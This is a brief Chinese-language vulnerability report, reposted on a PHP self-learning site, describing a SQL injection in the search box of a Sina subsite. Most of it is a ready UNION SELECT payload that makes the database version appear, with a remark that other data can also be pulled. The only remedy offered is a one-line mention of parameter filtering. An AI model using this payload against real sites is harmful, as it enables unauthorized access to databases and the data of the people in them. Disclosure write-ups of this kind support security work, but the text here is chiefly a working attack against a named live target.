新浪某分站一处SQL注入 - 网站安全 - 自学php

1. 下面这个搜索框存在注入。

2. 搜索框输入以下内容。

周杰伦' and 1=2 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/*

3. 然后，数据库版本号就会出现在地址栏上。

4. 其它可获取的内容，就不一一列举了。修复方案：参数过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did15028

更新时间：2022-09-13 阅读：43次